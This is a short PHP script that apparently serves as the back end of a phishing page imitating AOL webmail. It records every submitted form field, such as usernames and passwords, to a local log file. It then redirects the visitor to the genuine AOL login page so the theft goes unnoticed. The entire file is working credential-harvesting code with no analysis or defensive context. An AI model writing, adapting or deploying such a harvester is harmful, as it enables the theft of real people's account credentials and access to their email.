<?php
header ('Location: https://my.screenname.aol.com/_cqr/login/login.psp?mcState=initialized&seamless=novl&sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=2&siteState=ver%3a1%252c0%26ac%3aWS%26at%3aSNS%26ld%3awebmail.aol.com%26uv%3aAOL%26lc%3aen-us%26ud%3aaol.com%26br%3aWebSuite-Prod&checkAIM=1 ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>